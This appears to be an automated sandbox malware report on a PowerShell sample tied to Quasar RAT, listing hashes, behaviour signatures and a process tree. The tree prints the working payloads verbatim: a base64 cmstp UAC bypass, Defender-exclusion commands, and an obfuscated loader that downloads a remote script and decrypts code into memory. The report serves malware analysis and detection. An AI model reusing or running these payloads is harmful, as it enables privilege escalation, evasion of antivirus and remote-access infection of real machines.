Analysis

  • max time kernel
    94s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-01-2025 09:24

General

  • Target

    c358e0a764cf471e8fbcad222793853b.ps1

  • Size

    368KB

  • MD5

    7a0090d72fbfbfa03eb02050e93d2ed7

  • SHA1

    66dc4bb7d8085d1fc894baf3271319a4329971bc

  • SHA256

    24fc3c7f746c3a037df97368a44462353b48160e58bb5e2c238280bbd2c9468f

  • SHA512

    aae5aacaa5d3bce53be878b4ef2f4bfee8a9085e67810f3f9acdea2ec4eb26f28d2caa23a62cf18562dd838cbcca50800992df14de5f5bc07c9d2079da8272c6

  • SSDEEP

    6144:WVLvQRko6c7UCeRYR3XhR1a3Nz1hpMkW3Wggec5kQ39JO9Wejhv:WxQB6c7UfYpD1a3BGRgenQ39DK

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\c358e0a764cf471e8fbcad222793853b.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3792
    • C:\Windows\system32\cscript.exe
      "C:\Windows\system32\cscript.exe" /nologo C:\Users\Admin\AppData\Local\Temp\tmp6561.vbs
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3360
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1828
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dn1ahvmk\dn1ahvmk.cmdline"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4688
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E79.tmp" "c:\Users\Admin\AppData\Local\Temp\dn1ahvmk\CSCDCC72EAF64314111B8ABB06133DF631.TMP"
                7⤵
                  PID:3012
              • C:\windows\system32\cmstp.exe
                "C:\windows\system32\cmstp.exe" /au C:\windows\temp\a2ptq5yy.inf
                6⤵
                  PID:3968
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geXpvaGlkaXhvbWF3YWhmKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnZ2t6djZRL1VIK2c4cVZ5TkhqcHc1M2tEMHE5dkpTYXI3c2FkVjM3MXlEcz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ29pWGk5SzljMkRlaytJMlgvOW5HY3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gbHhzd3N3b3hkcmt3aHFlKCRwYXJhbV92YXIpewlJRVggJyRicmJ5YmlqcnVzZmhxZ25tdXFna3NndmpoPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGtia3F4aGFoa2xpdmNmeGJneWVub3hycWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRxZmFnbXZ3cnJyZ3lieGtmYWd1ZXJza2ppPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJyYnliaWpydXNmaHFnbm11cWdrc2d2amgsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJHFmYWdtdndycnJneWJ4a2ZhZ3VlcnNramkuQ29weVRvKCRrYmtxeGhhaGtsaXZjZnhiZ3llbm94cnFlKTsJJHFmYWdtdndycnJneWJ4a2ZhZ3VlcnNramkuRGlzcG9zZSgpOwkkYnJieWJpanJ1c2ZocWdubXVxZ2tzZ3ZqaC5EaXNwb3NlKCk7CSRrYmtxeGhhaGtsaXZjZnhiZ3llbm94cnFlLkRpc3Bvc2UoKTsJJGtia3F4aGFoa2xpdmNmeGJneWVub3hycWUuVG9BcnJheSgpO31mdW5jdGlvbiBhamVjYWl5eWR3bmZmdG5qdXhtdnB6cmNkKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGlyd3Nta3VsaGJ6YXlxbWRrbnJjZmJ0aW9xd2xueXZyeGFuZXZ6ZT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHZlcHBpZnppZXNuaHhyZ2dneG9kd29peWpnaGR4ZGhpbGp2eHBsa2NvaXJzYXF5enF1PSRsaXJ3c21rdWxoYnpheXFtZGtucmNmYnRpb3F3bG55dnJ4YW5ldnplLkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHZlcHBpZnppZXNuaHhyZ2dneG9kd29peWpnaGR4ZGhpbGp2eHBsa2NvaXJzYXF5enF1LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kbGptdmdzdWFuYnJjbGhsbnBqamZqa3VkciA9ICRlbnY6VVNFUk5BTUU7JGluZnBoYmVydmJuYndlYWJvZ3B6enFnbGIgPSAnQzpcVXNlcnNcJyArICRsam12Z3N1YW5icmNsaGxucGpqZmprdWRyICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaW5mcGhiZXJ2Ym5id2VhYm9ncHp6cWdsYjskamN6Ymg9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRpbmZwaGJlcnZibmJ3ZWFib2dwenpxZ2xiKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWZxIGluICRqY3piaCkgewlpZiAoJHlmcS5TdGFydHNXaXRoKCc6OicpKQl7CQkkc2h0bnk9JHlmcS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZG5sYm1vY21td3JoeG9sYnl2cmd2dW1pdD1bc3RyaW5nW11dJHNodG55LlNwbGl0KCdcJyk7SUVYICckemVncXRxcG9neGt3ZmFmbXZraWdzcWZobj1seHN3c3dveGRya3docWUgKHl6b2hpZGl4b21hd2FoZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkbmxibW9jbW13cmh4b2xieXZyZ3Z1bWl0WzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHhjamluamJjaG5qd3ZzZ2N0cnJhZnR1bHU9bHhzd3N3b3hkcmt3aHFlICh5em9oaWRpeG9tYXdhaGYgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZG5sYm1vY21td3JoeG9sYnl2cmd2dW1pdFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTthamVjYWl5eWR3bmZmdG5qdXhtdnB6cmNkICR6ZWdxdHFwb2d4a3dmYWZtdmtpZ3NxZmhuICRudWxsO2FqZWNhaXl5ZHduZmZ0bmp1eG12cHpyY2QgJHhjamluamJjaG5qd3ZzZ2N0cnJhZnR1bHUgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:3240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5072
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1504

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        223bd4ae02766ddc32e6145fd1a29301

        SHA1

        900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

        SHA256

        1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

        SHA512

        648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        94706a15a0916f9aad7dc4e6ff7e176f

        SHA1

        b23cdc14228c33596f7881b83974c774d2228a6e

        SHA256

        d76e3a2f8452c0dd242c6f0015991460c272215120e8b37b71131beb9d4599d8

        SHA512

        27b00ddce90cfe60ec159ac38336e1bc227540ca56f5b0286650c9f82ac466b5356dbe2346df6d43a5db7dbe0bba719d89158a3831910a6a650106494da2a996

